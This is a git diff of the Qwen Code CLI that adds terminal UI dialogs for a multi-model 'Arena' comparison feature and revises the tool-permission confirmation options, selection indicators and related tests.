+ */ +function getDiffStats(diff: string | undefined): { + text: string; + additions: number; + deletions: number; +} { + if (!diff) return { text: '', additions: 0, deletions: 0 }; + const lines = diff.split('\n'); + let additions = 0; + let deletions = 0; + for (const line of lines) { + if (line.startsWith('+') && !line.startsWith('+++')) { + additions++; + } else if (line.startsWith('-') && !line.startsWith('---')) { + deletions++; + } + } + return { text: `+${additions}/-${deletions}`, additions, deletions }; +} + +const MAX_MODEL_NAME_LENGTH = 35; + +export const ArenaSessionCard: React.FC = ({ + sessionStatus, + task, + agents, + width, +}) => { + // Truncate task for display + const maxTaskLen = 60; + const displayTask = + task.length > maxTaskLen ? task.slice(0, maxTaskLen - 1) + '…' : task; + + // Column widths for the agent table (unified with Arena Results) + const colStatus = 14; + const colTime = 8; + const colTokens = 10; + const colChanges = 10; + + const titleLabel = + sessionStatus === 'idle' + ? 'Agents Status · Idle' + : sessionStatus === 'completed' + ? 'Arena Complete' + : sessionStatus === 'cancelled' + ? 'Arena Cancelled' + : 'Arena Failed'; + + return ( + + {/* Title - neutral color (not green) */} + + + {titleLabel} + + + + + + {/* Task */} + + + Task: + "{displayTask}" + + + + + + {/* Table header - unified columns: Agent, Status, Time, Tokens, Changes */} + + + + Agent + + + + + Status + + + + + Time + + + + + Tokens + + + + + Changes + + + + + {/* Table separator */} + + + {'─'.repeat((width ?? 
60) - 8)} + + + + {/* Agent rows */} + {agents.map((agent) => { + const { text: statusText, color } = getArenaStatusLabel(agent.status); + const diffStats = getDiffStats(agent.diff); + return ( + + + + {truncate(agent.label, MAX_MODEL_NAME_LENGTH)} + + + + {statusText} + + + + {pad(formatDuration(agent.durationMs), colTime - 1, 'right')} + + + + + {pad( + agent.totalTokens.toLocaleString(), + colTokens - 1, + 'right', + )} + + + + {diffStats.additions > 0 || diffStats.deletions > 0 ? ( + + + +{diffStats.additions} + + / + -{diffStats.deletions} + + ) : ( + - + )} + + + ); + })} + + + + {/* Hint */} + {sessionStatus === 'idle' && ( + + + Switch to an agent tab to continue, or{' '} + /arena select to pick a + winner. + + + )} + {sessionStatus === 'completed' && ( + + + Run /arena select to pick a + winner. + + + )} + + ); +}; diff --git a/packages/cli/src/ui/components/arena/ArenaSelectDialog.tsx b/packages/cli/src/ui/components/arena/ArenaSelectDialog.tsx new file mode 100644 index 000000000..88fe5a507 --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaSelectDialog.tsx @@ -0,0 +1,260 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useCallback, useMemo } from 'react'; +import { Box, Text } from 'ink'; +import { + type ArenaManager, + isSuccessStatus, + type Config, +} from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { MessageType, type HistoryItemWithoutId } from '../../types.js'; +import type { UseHistoryManagerReturn } from '../../hooks/useHistoryManager.js'; +import { formatDuration } from '../../utils/formatters.js'; +import { getArenaStatusLabel } from '../../utils/displayUtils.js'; +import { DescriptiveRadioButtonSelect } from '../shared/DescriptiveRadioButtonSelect.js'; +import type { DescriptiveRadioSelectItem } from 
'../shared/DescriptiveRadioButtonSelect.js'; + +interface ArenaSelectDialogProps { + manager: ArenaManager; + config: Config; + addItem: UseHistoryManagerReturn['addItem']; + closeArenaDialog: () => void; +} + +export function ArenaSelectDialog({ + manager, + config, + addItem, + closeArenaDialog, +}: ArenaSelectDialogProps): React.JSX.Element { + const pushMessage = useCallback( + (result: { messageType: 'info' | 'error'; content: string }) => { + const item: HistoryItemWithoutId = { + type: + result.messageType === 'info' ? MessageType.INFO : MessageType.ERROR, + text: result.content, + }; + addItem(item, Date.now()); + + try { + const chatRecorder = config.getChatRecordingService(); + chatRecorder?.recordSlashCommand({ + phase: 'result', + rawCommand: '/arena select', + outputHistoryItems: [{ ...item } as Record], + }); + } catch { + // Best-effort recording + } + }, + [addItem, config], + ); + + const onSelect = useCallback( + async (agentId: string) => { + closeArenaDialog(); + const mgr = config.getArenaManager(); + if (!mgr) { + pushMessage({ + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }); + return; + } + + const agent = + mgr.getAgentState(agentId) ?? + mgr.getAgentStates().find((item) => item.agentId === agentId); + const label = agent?.model.modelId || agentId; + + pushMessage({ + messageType: 'info', + content: `Applying changes from ${label}…`, + }); + const result = await mgr.applyAgentResult(agentId); + if (!result.success) { + pushMessage({ + messageType: 'error', + content: `Failed to apply changes from ${label}: ${result.error}`, + }); + return; + } + + try { + await config.cleanupArenaRuntime(true); + } catch (err) { + pushMessage({ + messageType: 'error', + content: `Warning: failed to clean up arena resources: ${err instanceof Error ? err.message : String(err)}`, + }); + } + pushMessage({ + messageType: 'info', + content: `Applied changes from ${label} to workspace. 
Arena session complete.`, + }); + }, + [closeArenaDialog, config, pushMessage], + ); + + const onDiscard = useCallback(async () => { + closeArenaDialog(); + const mgr = config.getArenaManager(); + if (!mgr) { + pushMessage({ + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }); + return; + } + + try { + pushMessage({ + messageType: 'info', + content: 'Discarding Arena results and cleaning up…', + }); + await config.cleanupArenaRuntime(true); + pushMessage({ + messageType: 'info', + content: 'Arena results discarded. All worktrees cleaned up.', + }); + } catch (err) { + pushMessage({ + messageType: 'error', + content: `Failed to clean up arena worktrees: ${err instanceof Error ? err.message : String(err)}`, + }); + } + }, [closeArenaDialog, config, pushMessage]); + + const result = manager.getResult(); + const agents = manager.getAgentStates(); + + const items: Array> = useMemo( + () => + agents.map((agent) => { + const label = agent.model.modelId; + const statusInfo = getArenaStatusLabel(agent.status); + const duration = formatDuration(agent.stats.durationMs); + const tokens = agent.stats.totalTokens.toLocaleString(); + + // Build diff summary from cached result if available + let diffAdditions = 0; + let diffDeletions = 0; + if (isSuccessStatus(agent.status) && result) { + const agentResult = result.agents.find( + (a) => a.agentId === agent.agentId, + ); + if (agentResult?.diff) { + const lines = agentResult.diff.split('\n'); + for (const line of lines) { + if (line.startsWith('+') && !line.startsWith('+++')) { + diffAdditions++; + } else if (line.startsWith('-') && !line.startsWith('---')) { + diffDeletions++; + } + } + } + } + + // Title: full model name (not truncated) + const title = {label}; + + // Description: status, time, tokens, changes (unified with Arena Complete columns) + const description = ( + + {statusInfo.text} + · + {duration} + · + {tokens} tokens + {(diffAdditions > 0 || diffDeletions > 0) && ( + <> + 
· + +{diffAdditions} + / + -{diffDeletions} + lines + + )} + + ); + + return { + key: agent.agentId, + value: agent.agentId, + title, + description, + disabled: !isSuccessStatus(agent.status), + }; + }), + [agents, result], + ); + + useKeypress( + (key) => { + if (key.name === 'escape') { + closeArenaDialog(); + } + if (key.name === 'd' && !key.ctrl && !key.meta) { + onDiscard(); + } + }, + { isActive: true }, + ); + + const task = result?.task || ''; + + return ( + + {/* Neutral title color (not green) */} + + Arena Results + + + + + Task: + {`"${task.length > 60 ? task.slice(0, 59) + '…' : task}"`} + + + + + + Select a winner to apply changes: + + + + + !item.disabled)} + onSelect={(agentId: string) => { + onSelect(agentId); + }} + isFocused={true} + showNumbers={false} + /> + + + + + Enter to select, d to discard all, Esc to cancel + + + + ); +} diff --git a/packages/cli/src/ui/components/arena/ArenaStartDialog.tsx b/packages/cli/src/ui/components/arena/ArenaStartDialog.tsx new file mode 100644 index 000000000..6ce610887 --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaStartDialog.tsx @@ -0,0 +1,161 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import Link from 'ink-link'; +import { AuthType } from '@qwen-code/qwen-code-core'; +import { useConfig } from '../../contexts/ConfigContext.js'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { MultiSelect } from '../shared/MultiSelect.js'; +import { t } from '../../../i18n/index.js'; + +interface ArenaStartDialogProps { + onClose: () => void; + onConfirm: (selectedModels: string[]) => void; +} + +const MODEL_PROVIDERS_DOCUMENTATION_URL = + 'https://qwenlm.github.io/qwen-code-docs/en/users/configuration/settings/#modelproviders'; + +export function ArenaStartDialog({ + onClose, 
+ onConfirm, +}: ArenaStartDialogProps): React.JSX.Element { + const config = useConfig(); + const [errorMessage, setErrorMessage] = useState(null); + + const modelItems = useMemo(() => { + const allModels = config.getAllConfiguredModels(); + const selectableModels = allModels.filter((model) => !model.isRuntimeModel); + + return selectableModels.map((model) => { + const token = `${model.authType}:${model.id}`; + const isQwenOauth = model.authType === AuthType.QWEN_OAUTH; + return { + key: token, + value: token, + label: `[${model.authType}] ${model.label}`, + disabled: isQwenOauth, + }; + }); + }, [config]); + const hasDisabledQwenOauth = modelItems.some((item) => item.disabled); + const selectableModelCount = modelItems.filter( + (item) => !item.disabled, + ).length; + const needsMoreModels = selectableModelCount < 2; + const shouldShowMoreModelsHint = + selectableModelCount >= 2 && selectableModelCount < 3; + + useKeypress( + (key) => { + if (key.name === 'escape') { + onClose(); + } + }, + { isActive: true }, + ); + + const handleConfirm = (values: string[]) => { + if (values.length < 2) { + setErrorMessage( + t('Please select at least 2 models to start an Arena session.'), + ); + return; + } + + setErrorMessage(null); + onConfirm(values); + }; + + return ( + + {t('Select Models')} + + {modelItems.length === 0 ? ( + + + {t('No models available. Please configure models first.')} + + + ) : ( + + + + )} + + {errorMessage && ( + + {errorMessage} + + )} + + {(hasDisabledQwenOauth || needsMoreModels) && ( + + {hasDisabledQwenOauth && ( + + {t('Note: qwen-oauth models are not supported in Arena.')} + + )} + {needsMoreModels && ( + <> + + {t('Arena requires at least 2 models. 
To add more:')} + + + {t( + ' - Run /auth to set up a Coding Plan (includes multiple models)', + )} + + + {t(' - Or configure modelProviders in settings.json')} + + + )} + + )} + + {shouldShowMoreModelsHint && ( + <> + + + {t('Configure more models with the modelProviders guide:')} + + + + + + {MODEL_PROVIDERS_DOCUMENTATION_URL} + + + + + )} + + + + {t('Space to toggle, Enter to confirm, Esc to cancel')} + + + + ); +} diff --git a/packages/cli/src/ui/components/arena/ArenaStatusDialog.tsx b/packages/cli/src/ui/components/arena/ArenaStatusDialog.tsx new file mode 100644 index 000000000..e4a48031a --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaStatusDialog.tsx @@ -0,0 +1,288 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useEffect, useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import { + type ArenaManager, + type ArenaAgentState, + type InProcessBackend, + type AgentStatsSummary, + isSettledStatus, + ArenaSessionStatus, + DISPLAY_MODE, +} from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { formatDuration } from '../../utils/formatters.js'; +import { getArenaStatusLabel } from '../../utils/displayUtils.js'; + +const STATUS_REFRESH_INTERVAL_MS = 2000; +const IN_PROCESS_REFRESH_INTERVAL_MS = 1000; + +interface ArenaStatusDialogProps { + manager: ArenaManager; + closeArenaDialog: () => void; + width?: number; +} + +function truncate(str: string, maxLen: number): string { + if (str.length <= maxLen) return str; + return str.slice(0, maxLen - 1) + '…'; +} + +function pad( + str: string, + len: number, + align: 'left' | 'right' = 'left', +): string { + if (str.length >= len) return str.slice(0, len); + const padding = ' '.repeat(len - str.length); + return align === 'right' ? 
padding + str : str + padding; +} + +function getElapsedMs(agent: ArenaAgentState): number { + if (isSettledStatus(agent.status)) { + return agent.stats.durationMs; + } + return Date.now() - agent.startedAt; +} + +function getSessionStatusLabel(status: ArenaSessionStatus): { + text: string; + color: string; +} { + switch (status) { + case ArenaSessionStatus.RUNNING: + return { text: 'Running', color: theme.status.success }; + case ArenaSessionStatus.INITIALIZING: + return { text: 'Initializing', color: theme.status.warning }; + case ArenaSessionStatus.IDLE: + return { text: 'Idle', color: theme.status.success }; + case ArenaSessionStatus.COMPLETED: + return { text: 'Completed', color: theme.status.success }; + case ArenaSessionStatus.CANCELLED: + return { text: 'Cancelled', color: theme.status.warning }; + case ArenaSessionStatus.FAILED: + return { text: 'Failed', color: theme.status.error }; + default: + return { text: String(status), color: theme.text.secondary }; + } +} + +const MAX_MODEL_NAME_LENGTH = 35; + +export function ArenaStatusDialog({ + manager, + closeArenaDialog, + width, +}: ArenaStatusDialogProps): React.JSX.Element { + const [tick, setTick] = useState(0); + + // Detect in-process backend for live stats reading + const backend = manager.getBackend(); + const isInProcess = backend?.type === DISPLAY_MODE.IN_PROCESS; + const inProcessBackend = isInProcess ? (backend as InProcessBackend) : null; + + useEffect(() => { + const interval = isInProcess + ? IN_PROCESS_REFRESH_INTERVAL_MS + : STATUS_REFRESH_INTERVAL_MS; + const timer = setInterval(() => { + setTick((prev) => prev + 1); + }, interval); + return () => clearInterval(timer); + }, [isInProcess]); + + // Force re-read on every tick + void tick; + + const sessionStatus = manager.getSessionStatus(); + const sessionLabel = getSessionStatusLabel(sessionStatus); + const agents = manager.getAgentStates(); + const task = manager.getTask() ?? 
''; + + // For in-process mode, read live stats directly from AgentInteractive + const liveStats = useMemo(() => { + if (!inProcessBackend) return null; + const statsMap = new Map(); + for (const agent of agents) { + const interactive = inProcessBackend.getAgent(agent.agentId); + if (interactive) { + statsMap.set(agent.agentId, interactive.getStats()); + } + } + return statsMap; + // eslint-disable-next-line react-hooks/exhaustive-deps + }, [inProcessBackend, agents, tick]); + + const maxTaskLen = 60; + const displayTask = + task.length > maxTaskLen ? task.slice(0, maxTaskLen - 1) + '…' : task; + + const colStatus = 14; + const colTime = 8; + const colTokens = 10; + const colRounds = 8; + const colTools = 8; + + useKeypress( + (key) => { + if (key.name === 'escape' || key.name === 'q' || key.name === 'return') { + closeArenaDialog(); + } + }, + { isActive: true }, + ); + + // Inner content width: total width minus border (2) and paddingX (2*2) + const innerWidth = (width ?? 80) - 6; + + return ( + + {/* Title */} + + + Arena Status + + · + {sessionLabel.text} + + + + + {/* Task */} + + + Task: + "{displayTask}" + + + + + + {/* Table header */} + + + + Agent + + + + + Status + + + + + Time + + + + + Tokens + + + + + Rounds + + + + + Tools + + + + + {/* Separator */} + + {'─'.repeat(innerWidth)} + + + {/* Agent rows */} + {agents.map((agent) => { + const label = agent.model.modelId; + const { text: statusText, color } = getArenaStatusLabel(agent.status); + const elapsed = getElapsedMs(agent); + + // Use live stats from AgentInteractive when in-process, otherwise + // fall back to the cached ArenaAgentState.stats (file-polled). + const live = liveStats?.get(agent.agentId); + const totalTokens = live?.totalTokens ?? agent.stats.totalTokens; + const rounds = live?.rounds ?? agent.stats.rounds; + const toolCalls = live?.totalToolCalls ?? agent.stats.toolCalls; + const successfulToolCalls = + live?.successfulToolCalls ?? 
agent.stats.successfulToolCalls; + const failedToolCalls = + live?.failedToolCalls ?? agent.stats.failedToolCalls; + + return ( + + + + + {truncate(label, MAX_MODEL_NAME_LENGTH)} + + + + {statusText} + + + + {pad(formatDuration(elapsed), colTime - 1, 'right')} + + + + + {pad(totalTokens.toLocaleString(), colTokens - 1, 'right')} + + + + + {pad(String(rounds), colRounds - 1, 'right')} + + + + {failedToolCalls > 0 ? ( + + + {successfulToolCalls} + + / + {failedToolCalls} + + ) : ( + 0 ? theme.status.success : theme.text.primary + } + > + {pad(String(toolCalls), colTools - 1, 'right')} + + )} + + + + ); + })} + + {agents.length === 0 && ( + + No agents registered yet. + + )} + + ); +} diff --git a/packages/cli/src/ui/components/arena/ArenaStopDialog.tsx b/packages/cli/src/ui/components/arena/ArenaStopDialog.tsx new file mode 100644 index 000000000..65f363793 --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaStopDialog.tsx @@ -0,0 +1,213 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useCallback, useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import { + ArenaSessionStatus, + createDebugLogger, + type Config, +} from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { MessageType, type HistoryItemWithoutId } from '../../types.js'; +import type { UseHistoryManagerReturn } from '../../hooks/useHistoryManager.js'; +import { DescriptiveRadioButtonSelect } from '../shared/DescriptiveRadioButtonSelect.js'; +import type { DescriptiveRadioSelectItem } from '../shared/DescriptiveRadioButtonSelect.js'; + +const debugLogger = createDebugLogger('ARENA_STOP_DIALOG'); + +type StopAction = 'cleanup' | 'preserve'; + +interface ArenaStopDialogProps { + config: Config; + addItem: UseHistoryManagerReturn['addItem']; + closeArenaDialog: () => void; +} + +export function 
ArenaStopDialog({ + config, + addItem, + closeArenaDialog, +}: ArenaStopDialogProps): React.JSX.Element { + const [isProcessing, setIsProcessing] = useState(false); + + const pushMessage = useCallback( + (result: { messageType: 'info' | 'error'; content: string }) => { + const item: HistoryItemWithoutId = { + type: + result.messageType === 'info' ? MessageType.INFO : MessageType.ERROR, + text: result.content, + }; + addItem(item, Date.now()); + + try { + const chatRecorder = config.getChatRecordingService(); + chatRecorder?.recordSlashCommand({ + phase: 'result', + rawCommand: '/arena stop', + outputHistoryItems: [{ ...item } as Record], + }); + } catch { + // Best-effort recording + } + }, + [addItem, config], + ); + + const onStop = useCallback( + async (action: StopAction) => { + if (isProcessing) return; + setIsProcessing(true); + closeArenaDialog(); + + const mgr = config.getArenaManager(); + if (!mgr) { + pushMessage({ + messageType: 'error', + content: 'No running Arena session found.', + }); + return; + } + + try { + const sessionStatus = mgr.getSessionStatus(); + if ( + sessionStatus === ArenaSessionStatus.RUNNING || + sessionStatus === ArenaSessionStatus.INITIALIZING + ) { + pushMessage({ + messageType: 'info', + content: 'Stopping Arena agents…', + }); + await mgr.cancel(); + } + await mgr.waitForSettled(); + pushMessage({ + messageType: 'info', + content: 'Cleaning up Arena resources…', + }); + + if (action === 'preserve') { + await mgr.cleanupRuntime(); + } else { + await mgr.cleanup(); + } + config.setArenaManager(null); + + if (action === 'preserve') { + pushMessage({ + messageType: 'info', + content: + 'Arena session stopped. Worktrees and session files were preserved. ' + + 'Use /arena select --discard to manually clean up later.', + }); + } else { + pushMessage({ + messageType: 'info', + content: + 'Arena session stopped. 
All Arena resources (including Git worktrees) were cleaned up.', + }); + } + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + debugLogger.error('Failed to stop Arena session:', error); + pushMessage({ + messageType: 'error', + content: `Failed to stop Arena session: ${message}`, + }); + } + }, + [isProcessing, closeArenaDialog, config, pushMessage], + ); + + const configPreserve = + config.getAgentsSettings().arena?.preserveArtifacts ?? false; + + const items: Array> = useMemo( + () => [ + { + key: 'cleanup', + value: 'cleanup' as StopAction, + title: Stop and clean up, + description: ( + + Remove all worktrees and session files + + ), + }, + { + key: 'preserve', + value: 'preserve' as StopAction, + title: Stop and preserve artifacts, + description: ( + + Keep worktrees and session files for later inspection + + ), + }, + ], + [], + ); + + const defaultIndex = configPreserve ? 1 : 0; + + useKeypress( + (key) => { + if (key.name === 'escape') { + closeArenaDialog(); + } + }, + { isActive: !isProcessing }, + ); + + return ( + + + Stop Arena Session + + + + + Choose what to do with Arena artifacts: + + + + + { + onStop(action); + }} + isFocused={!isProcessing} + showNumbers={false} + /> + + + {configPreserve && ( + + + Default: preserve (agents.arena.preserveArtifacts is enabled) + + + )} + + + + Enter to confirm, Esc to cancel + + + + ); +} diff --git a/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap b/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap index a872a8859..c46d18235 100644 --- a/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap +++ b/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap @@ -1,33 +1,33 @@ // Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html exports[`ActionSelectionStep Snapshots > should render for active 
extension without update 1`] = ` -"● View Details +"› View Details Disable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render for disabled extension 1`] = ` -"● View Details +"› View Details Enable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render for disabled extension with update 1`] = ` -"● View Details +"› View Details Update Extension Enable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render for extension with update available 1`] = ` -"● View Details +"› View Details Update Extension Disable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render with no extension selected 1`] = ` -"● View Details +"› View Details Enable Extension Uninstall Extension" `; diff --git a/packages/cli/src/ui/components/messages/StatusMessages.tsx b/packages/cli/src/ui/components/messages/StatusMessages.tsx index e6e945bbd..b6b026a28 100644 --- a/packages/cli/src/ui/components/messages/StatusMessages.tsx +++ b/packages/cli/src/ui/components/messages/StatusMessages.tsx @@ -75,7 +75,7 @@ export const SuccessMessage: React.FC = ({ text }) => ( export const WarningMessage: React.FC = ({ text }) => ( diff --git a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx index 11daefa3b..17b7ea44e 100644 --- a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx +++ b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx @@ -138,17 +138,17 @@ describe('ToolConfirmationMessage', () => { { description: 'for exec confirmations', details: execConfirmationDetails, - alwaysAllowText: 'Yes, allow always', + alwaysAllowText: 'Always allow in this project', }, { description: 'for info confirmations', details: infoConfirmationDetails, - alwaysAllowText: 'Yes, allow always', + alwaysAllowText: 'Always allow in this project', 
}, { description: 'for mcp confirmations', details: mcpConfirmationDetails, - alwaysAllowText: 'always allow', + alwaysAllowText: 'Always allow in this project', }, ])('$description', ({ details, alwaysAllowText }) => { it('should show "allow always" when folder is trusted', () => { diff --git a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx index 34eb34cac..3946b0b05 100644 --- a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx +++ b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx @@ -242,11 +242,19 @@ export const ToolConfirmationMessage: React.FC< value: ToolConfirmationOutcome.ProceedOnce, key: 'Yes, allow once', }); - if (isTrustedFolder) { + if (isTrustedFolder && !confirmationDetails.hideAlwaysAllow) { + const rulesLabel = executionProps.permissionRules?.length + ? ` [${executionProps.permissionRules.join(', ')}]` + : ''; options.push({ - label: t('Yes, allow always ...'), - value: ToolConfirmationOutcome.ProceedAlways, - key: 'Yes, allow always ...', + label: t('Always allow in this project') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', + }); + options.push({ + label: t('Always allow for this user') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }); } options.push({ @@ -315,11 +323,21 @@ export const ToolConfirmationMessage: React.FC< value: ToolConfirmationOutcome.ProceedOnce, key: 'Yes, allow once', }); - if (isTrustedFolder) { + if (isTrustedFolder && !confirmationDetails.hideAlwaysAllow) { + const rulesLabel = + 'permissionRules' in infoProps && + (infoProps as { permissionRules?: string[] }).permissionRules?.length + ? 
` [${(infoProps as { permissionRules?: string[] }).permissionRules!.join(', ')}]` + : ''; options.push({ - label: t('Yes, allow always'), - value: ToolConfirmationOutcome.ProceedAlways, - key: 'Yes, allow always', + label: t('Always allow in this project') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', + }); + options.push({ + label: t('Always allow for this user') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }); } options.push({ @@ -382,21 +400,19 @@ export const ToolConfirmationMessage: React.FC< value: ToolConfirmationOutcome.ProceedOnce, key: 'Yes, allow once', }); - if (isTrustedFolder) { + if (isTrustedFolder && !confirmationDetails.hideAlwaysAllow) { + const rulesLabel = mcpProps.permissionRules?.length + ? ` [${mcpProps.permissionRules.join(', ')}]` + : ''; options.push({ - label: t('Yes, always allow tool "{{tool}}" from server "{{server}}"', { - tool: mcpProps.toolName, - server: mcpProps.serverName, - }), - value: ToolConfirmationOutcome.ProceedAlwaysTool, // Cast until types are updated - key: `Yes, always allow tool "${mcpProps.toolName}" from server "${mcpProps.serverName}"`, + label: t('Always allow in this project') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', }); options.push({ - label: t('Yes, always allow all tools from server "{{server}}"', { - server: mcpProps.serverName, - }), - value: ToolConfirmationOutcome.ProceedAlwaysServer, - key: `Yes, always allow all tools from server "${mcpProps.serverName}"`, + label: t('Always allow for this user') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }); } options.push({ diff --git a/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx b/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx index bbebc1361..a5931119b 100644 --- 
a/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx +++ b/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx @@ -6,7 +6,7 @@ import type React from 'react'; import { useMemo } from 'react'; -import { Box, Text } from 'ink'; +import { Box } from 'ink'; import type { IndividualToolCallDisplay } from '../../types.js'; import { ToolCallStatus } from '../../types.js'; import { ToolMessage } from './ToolMessage.js'; @@ -136,13 +136,6 @@ export const ToolGroupMessage: React.FC = ({ contentWidth={innerWidth} /> )} - {tool.outputFile && ( - - - Output too long and was saved to: {tool.outputFile} - - - )} ); })} diff --git a/packages/cli/src/ui/components/messages/ToolMessage.test.tsx b/packages/cli/src/ui/components/messages/ToolMessage.test.tsx index 0c44a8ed9..e5f846601 100644 --- a/packages/cli/src/ui/components/messages/ToolMessage.test.tsx +++ b/packages/cli/src/ui/components/messages/ToolMessage.test.tsx @@ -300,4 +300,55 @@ describe('', () => { ); expect(lastFrame()).toContain('MockAnsiOutput:hello'); }); + + it('renders rejected plan content with plan text still visible', () => { + const planResultDisplay = { + type: 'plan_summary' as const, + message: 'Plan was rejected. Remaining in plan mode.', + plan: '# My Plan\n- Step 1: Do something\n- Step 2: Do another thing', + rejected: true, + }; + + const { lastFrame } = renderWithContext( + , + StreamingState.Idle, + ); + + const output = lastFrame(); + expect(output).toContain('Plan was rejected. 
Remaining in plan mode.'); + expect(output).toContain('MockMarkdown:# My Plan'); + expect(output).toContain('- Step 1: Do something'); + expect(output).toContain('- Step 2: Do another thing'); + }); + + it('renders approved plan content with approval message', () => { + const planResultDisplay = { + type: 'plan_summary' as const, + message: 'User approved the plan.', + plan: '# My Plan\n- Step 1\n- Step 2', + }; + + const { lastFrame } = renderWithContext( + , + StreamingState.Idle, + ); + + const output = lastFrame(); + expect(output).toContain('User approved the plan.'); + expect(output).toContain('MockMarkdown:# My Plan'); + expect(output).toContain('- Step 1'); + expect(output).toContain('- Step 2'); + }); }); diff --git a/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx b/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx index e17dea39b..13286440b 100644 --- a/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx +++ b/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx @@ -93,12 +93,12 @@ describe('BaseSelectionList', () => { expect(mockRenderItem).toHaveBeenCalledWith(items[0], expect.any(Object)); }); - it('should render the selection indicator (● or space) and layout', () => { + it('should render the selection indicator (› or space) and layout', () => { const { lastFrame } = renderComponent({}, 0); const output = lastFrame(); // Use regex to assert the structure: Indicator + Whitespace + Number + Label - expect(output).toMatch(/●\s+1\.\s+Item A/); + expect(output).toMatch(/›\s+1\.\s+Item A/); expect(output).toMatch(/\s+2\.\s+Item B/); expect(output).toMatch(/\s+3\.\s+Item C/); }); diff --git a/packages/cli/src/ui/components/shared/BaseSelectionList.tsx b/packages/cli/src/ui/components/shared/BaseSelectionList.tsx index 15664ef95..aacc63421 100644 --- a/packages/cli/src/ui/components/shared/BaseSelectionList.tsx +++ b/packages/cli/src/ui/components/shared/BaseSelectionList.tsx @@ -138,7 +138,7 @@ export 
function BaseSelectionList< color={isSelected ? theme.status.success : theme.text.primary} aria-hidden > - {isSelected ? '●' : ' '} + {isSelected ? '›' : ' '} diff --git a/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx b/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx index 396ee8c3a..8ab45c2de 100644 --- a/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx +++ b/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx @@ -66,7 +66,11 @@ export function DescriptiveRadioButtonSelect({ renderItem={(item, { titleColor }) => ( {item.title} - {item.description} + {typeof item.description === 'string' ? ( + {item.description} + ) : ( + item.description + )} )} /> diff --git a/packages/cli/src/ui/components/shared/MultiSelect.tsx b/packages/cli/src/ui/components/shared/MultiSelect.tsx new file mode 100644 index 000000000..b910430ba --- /dev/null +++ b/packages/cli/src/ui/components/shared/MultiSelect.tsx @@ -0,0 +1,193 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useCallback, useEffect, useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import { theme } from '../../semantic-colors.js'; +import { useSelectionList } from '../../hooks/useSelectionList.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import type { SelectionListItem } from '../../hooks/useSelectionList.js'; + +export interface MultiSelectItem extends SelectionListItem { + label: string; +} + +export interface MultiSelectProps { + items: Array>; + initialIndex?: number; + initialSelectedKeys?: string[]; + onConfirm: (selectedValues: T[]) 